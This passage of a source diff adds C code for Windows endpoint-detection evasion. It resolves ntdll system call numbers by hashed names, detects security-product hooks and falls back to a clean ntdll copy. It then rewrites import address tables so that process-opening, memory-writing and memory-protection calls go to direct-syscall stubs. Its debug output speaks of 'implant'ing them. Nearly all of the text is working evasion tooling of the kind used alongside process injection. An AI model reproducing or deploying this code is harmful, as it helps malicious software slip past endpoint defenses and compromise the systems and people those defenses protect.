+ pdwFunctions2 = (PDWORD)((PBYTE)pRealBase + pImageExportDirectory2->AddressOfFunctions);
+ pwNameOrdinals2 = (PWORD)((PBYTE)pRealBase + pImageExportDirectory2->AddressOfNameOrdinals);
+ }
+
+
+ SetTableAddr(&SyscallList.Entries);
+
+ pBase = ntdllBase;
+
+#ifdef DEBUG
+ printf("0x%p = &SyscallList\n0x%p = &Ntdll base\n0x%p = &Ntdll real base\n", &SyscallList, pBase, pRealBase);
+#endif
+
+procdll:
+
+ pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return FALSE;
+
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return FALSE;
+
+ ModList.Count = 1;
+ ModList.Entries[0].pAddress = pBase;
+
+ // Create a copy of the first 4096 bytes
+ PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+ //PVOID lpLocalAddress = VirtualAllocEx((HANDLE)-1, NULL, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ if (!lpLocalAddress)
+ return FALSE;
+
+ va = (PVOID)((PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+ memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+
+ pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(lpLocalAddress);
+
+#ifdef DEBUG
+ printf("0x%p = pImageExportDirectory\n", pImageExportDirectory);
+ printf("0x%p = lpLocalAddress\n", lpLocalAddress);
+#endif
+
+ PDWORD pdwFunctions;
+ PDWORD pdwNames;
+ PWORD pwNameOrdinals;
+
+ PCHAR pcName = NULL;
+ PVOID pAddress = NULL;
+
+ pdwFunctions = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfFunctions);
+ pdwNames = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNames);
+ pwNameOrdinals = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNameOrdinals);
+
+ PSYSCALL_INFO Entries = SyscallList.Entries;
+
+ DWORD idx = 0;
+ BOOLEAN force = FALSE;
+ BOOLEAN bDiff = FALSE;
+
+#ifdef DEBUG
+ printf("[>] Hooked Ntdll Syscall List:\n");
+#endif
+
+ USHORT nameBase[2] = { 'tN', 'wZ' };
+ for (WORD ib = 0; ib < sizeof(nameBase); ib++) {
+ for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+
+ force = FALSE;
+ pcName = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pdwNames[i]);
+ pAddress = (PBYTE)pBase + pdwFunctions[pwNameOrdinals[i]];
+
+ if (pImageExportDirectory2 != NULL && (DWORD64)pBase != (DWORD64)pRealBase && pImageExportDirectory->NumberOfNames == pImageExportDirectory2->NumberOfNames) {
+ PVOID pAddress2 = (PBYTE)pRealBase + pdwFunctions2[pwNameOrdinals2[i]];
+ bDiff = ((DWORD64)pAddress != (DWORD64)pAddress2);
+ }
+
+ if (lstrcmpiA(pcName, "RtlAllocateHeap") == 0)
+ pRtlAllocateHeap = (PVOID)pAddress;
+
+ // Is this a system call?
+ if ((*(USHORT*)pcName != nameBase[ib]))
+ continue;
+
+ //Skip 2 first chars to ignore Zw and Nt
+ DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+
+ if (dwHash == 0x66C71BD1B0714D3E) // NtQuerySystemTime => False positive
+ continue;
+
+ //Our minimal 7 functions
+ if ((dwHash == 0x8AD1C604A65844A5) || (dwHash == 0x7AF7191D67000DB5) || (dwHash == 0x852E6B87B62C2CF0) || (dwHash == 0x0F4CE15C0758B33F)
+ || (dwHash == 0x989246E5A13FCBD9) || (dwHash == 0x8599A0E7F8A94577) || (dwHash == 0x0EDA779755029A0A))
+ force = TRUE;
+
+ //Force other critical calls
+ /*
+ NtQueryVirtualMemory 0x0EDA779755029A0A
+ NtCreateUserProcess 0x172ECAD8537A0F66
+ NtCreateThread 0xDCAA9BF058531500
+ NtCreateThreadEx 0xB1C15967B96C5E5D
+ ZwResumeThread 0xE6EBB45B4D604B1D
+ */
+
+ if (!force && (
+ (dwHash == 0xDCAA9BF058531500) || (dwHash == 0xB1C15967B96C5E5D) || (dwHash == 0xE6EBB45B4D604B1D) || (dwHash == 0x172ECAD8537A0F66)
+ ))
+ force = TRUE;
+
+ ////printf("%s 0x%p 0x%p\n", pcName, pAddress, dwHash);
+
+ /*
+ Handle hooked functions
+
+ jmp
+ ; or
+ mov r10, rcx
+ jmp
+ */
+
+ DWORD64 dwSsn = GetSSN(pAddress);
+ if (dwSsn == -1)
+ continue;
+
+ PVOID pSyscallRet = GetNextSyscallInstruction(pAddress);
+ if (pSyscallRet == NULL)
+ continue;
+
+ BOOLEAN dupFound = FALSE;
+ for (DWORD id = 0; id < SyscallList.Count; id++)
+ {
+ ////printf("%d 0x%p 0x%p\n", id, (DWORD64)Entries[id].pAddress, (DWORD64)pAddress);
+
+ if ((DWORD64)Entries[id].pAddress == (DWORD64)pAddress) dupFound = TRUE;
+ }
+
+ if (dupFound)
+ continue;
+
+ Entries[idx].pAddress = pAddress;
+ Entries[idx].dwSsn = dwSsn;
+ Entries[idx].pSyscallRet = pSyscallRet;
+ Entries[idx].dwHash = dwHash;
+ Entries[idx].bIsHooked = (BOOLEAN)(force || bDiff || (*((PBYTE)pAddress) == 0xe9 || *((PBYTE)pAddress + 3) == 0xe9));
+
+#ifdef DEBUG
+ if (Entries[idx].bIsHooked)
+ {
+ printf(" |--> Entries[%03lu] SSN = 0x%04X, Address = 0x%p: %s\n", idx, dwSsn, pAddress, pcName);
+ }
+#endif
+
+ if (dwHash == 0x8AD1C604A65844A5)
+ SetIdx(0, idx); // 0 => ZwOpenProcess
+ else if (dwHash == 0x7AF7191D67000DB5)
+ SetIdx(1, idx); // 1 => ZwProtectVirtualMemory
+ else if (dwHash == 0x852E6B87B62C2CF0)
+ SetIdx(2, idx); // 2 => ZwReadVirtualMemory
+ else if (dwHash == 0x0F4CE15C0758B33F)
+ SetIdx(3, idx); // 3 => ZwWriteVirtualMemory
+ else if (dwHash == 0x989246E5A13FCBD9)
+ SetIdx(4, idx); // 4 => ZwAllocateVirtualMemory
+ else if (dwHash == 0x8599A0E7F8A94577)
+ SetIdx(5, idx); // 5 => ZwDelayExecution
+ else if (dwHash == 0x0EDA779755029A0A)
+ SetIdx(6, idx); // 6 => NtQueryVirtualMemory
+
+ idx++;
+ if (idx == MAX_ENTRIES) break;
+ continue;
+ }
+
+ // Save total number of system calls found.
+ SyscallList.Count = idx;
+
+ if (idx == MAX_ENTRIES) break;
+ }
+
+ if (SyscallList.Count < 7) {
+
+#ifdef DEBUG
+ printf(" |--> Getting other Ntdll version\n");
+#endif
+ PVOID npBase = GetClearNtdll();
+ if ((npBase != NULL) && ((DWORD64)npBase != (DWORD64)pBase)) {
+ pBase = npBase;
+ goto procdll;
+ }
+ }
+
+#ifdef DEBUG
+ printf(" +--> Mapped %lld functions\n", SyscallList.Count);
+#endif
+
+ if (SyscallList.Count > 0) {
+
+ SetAddr(&UnhookAll);
+
+ }
+
+ return SyscallList.Count > 0;
+}
+
+BOOL FillStatic()
+{
+ /*
+ GetProcAddress 0x7E5C872C2386C38E
+ ReadProcessMemory 0x008A113C2D680A68
+ VirtualProtect 0x9BE32131D8A4F9FC
+ VirtualProtectEx 0x2130350A95CB7259
+ VirtualQuery 0xE9CF8C23129C8A71
+ VirtualQueryEx 0x9BE321322BE8F40E
+ */
+
+ if (HookList.Count == 0) {
+ HookList.Entries[0].pStubFunction = &HGetProcAddress3;
+ HookList.Entries[0].dwHash = 0x7E5C872C2386C38E;
+
+ HookList.Entries[1].pStubFunction = &HReadProcessMemory;
+ HookList.Entries[1].dwHash = 0x008A113C2D680A68;
+
+ //HookList.Entries[2].pStubFunction = &HVirtualProtect;
+ //HookList.Entries[2].dwHash = 0x9BE32131D8A4F9FC;
+
+ HookList.Entries[3].pStubFunction = &HVirtualProtectEx;
+ HookList.Entries[3].dwHash = 0x2130350A95CB7259;
+
+ //HookList.Entries[4].pStubFunction = &HVirtualQuery;
+ //HookList.Entries[4].dwHash = 0xE9CF8C23129C8A71;
+
+ //HookList.Entries[5].pStubFunction = &HVirtualQueryEx;
+ //HookList.Entries[5].dwHash = 0x9BE321322BE8F40E;
+
+ HookList.Count = 6;
+ }
+
+ return TRUE;
+}
+
+BOOL ProcAllByAddr(_In_ LPCSTR imageBaseName, _In_ PVOID imageBase, _In_opt_ HANDLE hProcess)
+{
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PVOID va;
+ PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = NULL;
+ LPCSTR imageName;
+
+ unsigned int hCount = 0;
+
+ if (imageBaseName != NULL) {
+ imageName = imageBaseName;
+ }
+ else {
+ imageName = "in memory";
+ }
+
+ if (hProcess == NULL)
+ hProcess = (HANDLE)-1;
+
+ pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return FALSE;
+
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return FALSE;
+
+ // Create a copy of the first 4096 bytes
+ //PVOID lpLocalAddress = VirtualAllocEx((HANDLE)-1, NULL, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size);
+ if (!lpLocalAddress)
+ return FALSE;
+
+ va = (PVOID)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
+ memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size);
+
+ pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(lpLocalAddress);
+
+ LPCSTR libraryName = NULL;
+ HMODULE library = NULL;
+ PIMAGE_IMPORT_BY_NAME functionName = NULL;
+
+ PSYSCALL_INFO Entries = SyscallList.Entries;
+
+ DWORD minRVA = 0xffffffff;
+ DWORD maxRVA = 0;
+ PIMAGE_IMPORT_DESCRIPTOR tmp1 = (PIMAGE_IMPORT_DESCRIPTOR)(va);
+ while (tmp1->Name != NULL)
+ {
+ if (tmp1->Name > maxRVA)
+ maxRVA = tmp1->Name;
+ if (tmp1->Name < minRVA)
+ minRVA = tmp1->Name;
+
+ tmp1++;
+ }
+ maxRVA += 100; // Space for the last name
+
+
+ //PVOID lpNames = VirtualAllocEx((HANDLE)-1, NULL, maxRVA - minRVA, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ PVOID lpNames = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, maxRVA - minRVA);
+ if (!lpNames)
+ {
+#ifdef DEBUG
+ printf("[!] Error getting data space for lpNames: Status = 0x%08lx\n", GetLastError());
+#endif
+ return FALSE;
+ }
+
+ PVOID vaNames = (PVOID)((PBYTE)imageBase + minRVA);
+ memcpy(lpNames, vaNames, maxRVA - minRVA);
+
+ // Allocate 8 Mb
+ //PVOID lpThunk = VirtualAllocEx((HANDLE)-1, NULL, 1 << 23, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ PVOID lpThunk = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, 1 << 23);
+ if (!lpThunk)
+ {
+#ifdef DEBUG
+ printf("[!] Error getting data space for lpThunk: Status = 0x%08lx\n", GetLastError());
+#endif
+ return FALSE;
+ }
+
+
+ while (pImportDescriptor->Name != NULL)
+ {
+ libraryName = RVA2OFFSET(LPCSTR, imageBase, lpNames, vaNames, (LPCSTR)pImportDescriptor->Name);
+
+ library = HGetModuleHandleA(libraryName, TRUE);
+
+ if (library == NULL) {
+#ifdef DEBUG
+ printf("[!] Error getting lib: Status = 0x%08lx\n", GetLastError());
+#endif
+ }
+
+ if (library)
+ {
+ minRVA = 0xffffffff;
+ maxRVA = 0;
+ PIMAGE_THUNK_DATA tmp2 = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + pImportDescriptor->OriginalFirstThunk);
+ PIMAGE_THUNK_DATA tmp3 = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + pImportDescriptor->FirstThunk);
+ while (tmp2->u1.AddressOfData != NULL)
+ {
+ if (tmp2->u1.AddressOfData > maxRVA)
+ maxRVA = tmp2->u1.AddressOfData;
+ if (tmp2->u1.AddressOfData < minRVA)
+ minRVA = tmp2->u1.AddressOfData;
+
+ DWORD c1 = (DWORD_PTR)tmp2 - (DWORD_PTR)imageBase;
+ if (c1 > maxRVA)
+ maxRVA = c1;
+ if (c1 < minRVA)
+ minRVA = c1;
+
+ c1 = (DWORD_PTR)tmp3 - (DWORD_PTR)imageBase;
+ if (c1 > maxRVA)
+ maxRVA = c1;
+ if (c1 < minRVA)
+ minRVA = c1;
+
+ ++tmp2;
+ ++tmp3;
+ }
+ maxRVA += 100; // Space for the last name
+
+ if ((maxRVA - minRVA) <= (1 << 23))
+ {
+ PVOID vaFuncs = (PVOID)((PBYTE)imageBase + minRVA);
+ memcpy(lpThunk, vaFuncs, maxRVA - minRVA);
+
+ PIMAGE_THUNK_DATA originalFirstThunk = NULL, firstThunk = NULL;
+
+ originalFirstThunk = RVA2OFFSET(PIMAGE_THUNK_DATA, imageBase, lpThunk, vaFuncs, pImportDescriptor->OriginalFirstThunk);
+ firstThunk = RVA2OFFSET(PIMAGE_THUNK_DATA, imageBase, lpThunk, vaFuncs, pImportDescriptor->FirstThunk);
+
+ while ((originalFirstThunk->u1.AddressOfData != NULL) && ((originalFirstThunk->u1.AddressOfData & 0xffffffffffff) >= 0x1000))
+ {
+ functionName = RVA2OFFSET(PIMAGE_IMPORT_BY_NAME, imageBase, lpThunk, vaFuncs, originalFirstThunk->u1.AddressOfData);
+
+ PBYTE pcName = ((PBYTE)&functionName->Name);
+
+ PVOID fncAddr = NULL;
+ DWORD ssn = -1;
+ if ((DWORD64)library == (DWORD64)ntdllBase)
+ {
+ DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+
+ //printf("\n%s 0x%p, 0x%016llx\n", functionName->Name, firstThunk->u1.Function, dwHash);
+
+ for (DWORD i = 0; i < SyscallList.Count; i++)
+ {
+ //printf("%s 0x%p, 0x%p, 0x%p\n", functionName->Name, firstThunk->u1.Function, (DWORD64)Entries[i].pAddress, (DWORD64)firstThunk->u1.Function);
+
+ if ((DWORD64)Entries[i].pAddress == (DWORD64)firstThunk->u1.Function)
+ {
+ if (Entries[i].bIsHooked) {
+ fncAddr = Entries[i].pStubFunction;
+ ssn = Entries[i].dwSsn;
+ //printf("%s 0x%p 0x%016llx 0x%016llx\n", functionName->Name, fncAddr, dwHash, Entries[i].dwHash);
+ }
+ break;
+ }
+ else if (dwHash == Entries[i].dwHash)
+ {
+ //printf("%s 0x%p, 0x%p, 0x%p 0x%016llx\n", functionName->Name, firstThunk->u1.Function, (DWORD64)Entries[i].pAddress, fncAddr, dwHash);
+ fncAddr = Entries[i].pStubFunction;
+ ssn = Entries[i].dwSsn;
+ break;
+ }
+ }
+ }
+
+ if ((fncAddr == NULL) && ((DWORD64)library != (DWORD64)ntdllBase))
+ {
+ DWORD64 dwHash = djb2(((PBYTE)pcName));
+ for (DWORD i = 0; i < HookList.Count; i++)
+ {
+ if (dwHash == HookList.Entries[i].dwHash)
+ {
+ fncAddr = HookList.Entries[i].pStubFunction;
+ break;
+ }
+ }
+ }
+
+ if (fncAddr != NULL)
+ {
+ //printf("%s 0x%p\n", functionName->Name, fncAddr);
+
+ SIZE_T bytesWritten = 0;
+ DWORD oldProtect = 0;
+ PVOID lpAddress;
+ PVOID fncAddress;
+ SIZE_T sDataSize = 8;
+
+ PIMAGE_THUNK_DATA pRealThunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + OFFSET2RVA(imageBase, lpThunk, vaFuncs, firstThunk));
+
+ lpAddress = fncAddress = (LPVOID)(&pRealThunk->u1.Function);
+
+ HANDLE hProc = (HANDLE)-1;
+ if (hProcess != (HANDLE)-1)
+ hProc = hProcess;
+
+ if (NtProtectVirtualMemory(hProc, &lpAddress, &sDataSize, PAGE_READWRITE, &oldProtect) == 0)
+ {
+ pRealThunk->u1.Function = (DWORD_PTR)fncAddr;
+ hCount++;
+#ifdef DEBUG
+ if (ssn != -1)
+ printf(" |--> Implant %s %s->%s 0x%p SSN 0x%02X\n", imageName, libraryName, functionName->Name, pRealThunk->u1.Function, ssn);
+ else
+ printf(" |--> Implant %s %s->%s 0x%p\n", imageName, libraryName, functionName->Name, pRealThunk->u1.Function);
+#endif
+ }
+ }
+
+ ++originalFirstThunk;
+ ++firstThunk;
+ }
+ }
+ }
+
+ pImportDescriptor++;
+ }
+#ifdef DEBUG
+ printf(" +--> Hooked %d function(s)\n", hCount);
+#endif
+}
+
+BOOL UnhookAll(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force)
+{
+
+ LPVOID imageBase = HGetModuleHandleA(imageName, force);
+ if ((force && (imageBase == NULL)) || ((imageBase == NULL) && (hProcess != (HANDLE)-1)))
+ imageBase = HGetModuleHandleA(imageName, TRUE);
+#ifdef DEBUG
+ printf("\n[>] IAT Hook of: %s => 0x%p\n", imageName, imageBase);
+#endif
+ if (imageBase == NULL)
+ {
+
+#ifdef DEBUG
+
+ DWORD le = GetLastError();
+ if (le == 126) {
+ printf("[-] UnhookAll(%s): %s\n", imageName, "Module handle not found!");
+ }
+ else {
+ printf("[-] UnhookAll(%s): %u\n", imageName, GetLastError());
+ }
+#endif
+ return FALSE;
+ }
+
+ return ProcAllByAddr(imageName, imageBase, hProcess);
+ //return ExecAddr2(imageName, imageBase, hProcess);
+}
+
+FARPROC HGetModuleHandleA(LPCSTR imageName, _In_ BOOLEAN forceLoad)
+{
+
+ DWORD64 dwHash = djb2(((PBYTE)imageName) + 2);
+ PMODULE_INFO Entries = ModList.Entries;
+
+ for (DWORD i = 0; i < ModList.Count; i++)
+ {
+ if (dwHash == Entries[i].dwHash)
+ return (FARPROC)Entries[i].pAddress;
+ }
+
+ LPVOID imageBase = GetModuleHandleA(imageName);
+ if (forceLoad && (imageBase == NULL))
+ imageBase = LoadLibraryA(imageName);
+
+ if (imageBase == NULL)
+ return NULL;
+
+ Entries[ModList.Count].pAddress = imageBase;
+ Entries[ModList.Count].dwHash = dwHash;
+
+ ModList.Count++;
+
+ return imageBase;
+}
+
+FARPROC HGetProcAddress2(LPCSTR imageName, LPCSTR procName)
+{
+ LPVOID imageBase = HGetModuleHandleA(imageName, TRUE);
+
+ return HGetProcAddress(imageBase, procName, 0);
+}
+
+FARPROC HGetProcAddress3(FARPROC imageBase, LPCSTR procName)
+{
+ //FARPROC addr = HGetProcAddress(imageBase, procName, 0x00);
+ //printf("GetProcAddress 0x%p %s -> 0x%p\n", imageBase, procName, addr);
+ //return addr;
+ return HGetProcAddress(imageBase, procName, 0x00);
+}
+
+FARPROC HGetProcAddress(FARPROC imageBase, LPCSTR procName, _In_opt_ DWORD64 procHash)
+{
+ PPEB pCurrentPeb;
+
+ PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+
+ PVOID va;
+
+ pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return NULL;
+
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return NULL;
+
+ //Check if is a hooked/mapped function
+ if ((SyscallList.Count > 0) && ((DWORD64)ntdllBase == (DWORD64)imageBase)) {
+
+ PSYSCALL_INFO Entries = SyscallList.Entries;
+
+ DWORD64 dwHash = 0;
+ if (procName != NULL) dwHash = djb2(((PBYTE)procName) + 2);
+
+ for (DWORD i = 0; i < SyscallList.Count; i++)
+ {
+ if ((procHash > 0) && (procHash == Entries[i].dwHash))
+ return Entries[i].pStubFunction;
+
+ if ((procName != NULL) && (dwHash == Entries[i].dwHash))
+ return Entries[i].pStubFunction;
+ }
+ }
+
+ //Check if is a hooked/mapped function
+ if ((HookList.Count > 0) && (procName != NULL)) {
+
+ PSYSCALL_INFO Entries = HookList.Entries;
+
+ DWORD64 dwHash = djb2(((PBYTE)procName));
+
+ for (DWORD i = 0; i < HookList.Count; i++)
+ {
+ if (dwHash == Entries[i].dwHash)
+ return Entries[i].pStubFunction;
+ }
+ }
+
+ // Create a copy of the first 4096 bytes
+ PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+ if (!lpLocalAddress)
+ return NULL;
+
+ va = (PVOID)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+ memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+
+ pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(lpLocalAddress);
+
+ PDWORD pdwFunctions = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfFunctions);
+ PDWORD pdwNames = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNames);
+ PWORD pwNameOrdinals = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNameOrdinals);
+
+ LPCSTR pcName = NULL;
+ PVOID pAddress = NULL;
+
+ //LPCSTR
+
+ for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+ pcName = RVA2OFFSET(LPCSTR, imageBase, lpLocalAddress, va, pdwNames[i]);
+ pAddress = (PBYTE)imageBase + pdwFunctions[pwNameOrdinals[i]];
+
+ if (procHash > 0) {
+ DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+ if (dwHash == procHash)
+ return (PVOID)pAddress;
+ }
+
+ if ((procName != NULL) && (lstrcmpiA(pcName, procName) == 0))
+ return (PVOID)pAddress;
+
+ }
+
+ return NULL;
+}
+
+static PVOID GetNextSyscallInstruction(_In_ PVOID pStartAddr)
+{
+ for (DWORD i = 0, j = 1; i <= 512; i++, j++) {
+ if (*((PBYTE)pStartAddr + i) == 0x0f && *((PBYTE)pStartAddr + j) == 0x05) {
+ return (PVOID)((ULONG_PTR)pStartAddr + i);
+ }
+ }
+
+ return NULL;
+}
+
+static DWORD64 GetSSN(_In_ PVOID pAddress)
+{
+ BYTE low, high;
+
+ /*
+ Handle non-hooked functions
+
+ mov r10, rcx
+ mov rax,
+ */
+ if (*((PBYTE)pAddress + 0) == 0x4c && *((PBYTE)pAddress + 1) == 0x8b && *((PBYTE)pAddress + 2) == 0xd1 &&
+ *((PBYTE)pAddress + 3) == 0xb8 && *((PBYTE)pAddress + 6) == 0x00 && *((PBYTE)pAddress + 7) == 0x00) {
+
+ high = *((PBYTE)pAddress + 5);
+ low = *((PBYTE)pAddress + 4);
+
+ return (high << 8) | low;
+ }
+
+ // Derive SSN from neighbour syscalls
+ for (WORD idx = 1; idx <= MAX_NEIGHBOURS; idx++) {
+ if (*((PBYTE)pAddress + 0 + idx * NEXT) == 0x4c && *((PBYTE)pAddress + 1 + idx * NEXT) == 0x8b &&
+ *((PBYTE)pAddress + 2 + idx * NEXT) == 0xd1 && *((PBYTE)pAddress + 3 + idx * NEXT) == 0xb8 &&
+ *((PBYTE)pAddress + 6 + idx * NEXT) == 0x00 && *((PBYTE)pAddress + 7 + idx * NEXT) == 0x00) {
+
+ high = *((PBYTE)pAddress + 5 + idx * NEXT);
+ low = *((PBYTE)pAddress + 4 + idx * NEXT);
+
+ return (high << 8) | low - idx;
+ }
+
+ if (*((PBYTE)pAddress + 0 + idx * PREV) == 0x4c && *((PBYTE)pAddress + 1 + idx * PREV) == 0x8b &&
+ *((PBYTE)pAddress + 2 + idx * PREV) == 0xd1 && *((PBYTE)pAddress + 3 + idx * PREV) == 0xb8 &&
+ *((PBYTE)pAddress + 6 + idx * PREV) == 0x00 && *((PBYTE)pAddress + 7 + idx * PREV) == 0x00) {
+
+ high = *((PBYTE)pAddress + 5 + idx * PREV);
+ low = *((PBYTE)pAddress + 4 + idx * PREV);
+
+ return (high << 8) | low + idx;
+
+ }
+ }
+
+ return -1;
+}
+
+NTSTATUS NtAllocateVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect)
+{
+ return NtAllocateVirtualMemoryStub(ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect);
+}
+
+NTSTATUS NtWriteVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ PVOID Buffer, _In_ ULONG NumberOfBytesToWrite, _Out_opt_ PULONG NumberOfBytesWritten)
+{
+ return NtWriteVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten);
+}
+
+NTSTATUS NtOpenProcess(_Out_ PHANDLE ProcessHandle, _In_ ACCESS_MASK AccessMask, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ PCLIENT_ID ClientId)
+{
+ return NtOpenProcessStub(ProcessHandle, AccessMask, ObjectAttributes, ClientId);
+}
+
+NTSTATUS NtProtectVirtualMemory(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+{
+ return NtProtectVirtualMemoryStub(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection);
+}
+
+NTSTATUS NtReadVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded)
+{
+ return NtReadVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);
+}
+
+NTSTATUS NtQueryVirtualMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, _Out_ PVOID Buffer, _In_ ULONG Length, _Out_opt_ PULONG ResultLength)
+{
+ return NtQueryVirtualMemoryStub(ProcessHandle, BaseAddress, MemoryInformationClass, Buffer, Length, ResultLength);
+}
+
+BOOL HReadProcessMemory(_In_ HANDLE ProcessHandle, _In_ PVOID BaseAddress, _Out_ PVOID Buffer, _In_ ULONG NumberOfBytesToRead, _Out_opt_ PULONG NumberOfBytesReaded)
+{
+ return (NtReadVirtualMemoryStub(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded) == 0);
+}
+
+BOOL HVirtualProtect(_Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+{
+ return (NtProtectVirtualMemoryStub((HANDLE)-1, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection) == 0);
+}
+
+BOOL HVirtualProtectEx(_In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PULONG NumberOfBytesToProtect, _In_ ULONG NewAccessProtection, _Out_ PULONG OldAccessProtection)
+{
+ return (NtProtectVirtualMemoryStub(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection) == 0);
+}
+
+SIZE_T HVirtualQuery(_In_ PVOID* lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength)
+{
+ return HVirtualQueryEx((HANDLE)-1, lpAddress, lpBuffer, dwLength);
+}
+
+SIZE_T HVirtualQueryEx(_In_ HANDLE hProcess, _In_ PVOID* lpAddress, _Out_ PVOID lpBuffer, _In_ ULONG dwLength)
+{
+ SIZE_T ResultLength = 0;
+ NtQueryVirtualMemoryStub(hProcess, lpAddress, MemoryBasicInformation, lpBuffer, dwLength, &ResultLength);
+ printf("VirtualQuery %d %d\n", dwLength, ResultLength);
+ return ResultLength;
+}
+
+PVOID RtlAllocateHeapStub(_In_ PVOID HeapHandle, _In_ ULONG Flags, _In_ SIZE_T Size) {
+
+ if (pRtlAllocateHeap == NULL) {
+ PVOID addr = malloc(Size);
+ if ((Flags & HEAP_ZERO_MEMORY) == HEAP_ZERO_MEMORY)
+ memset(addr, 0x00, Size);
+ return addr;
+ }
+
+ PVOID(*AH)(void) = pRtlAllocateHeap;
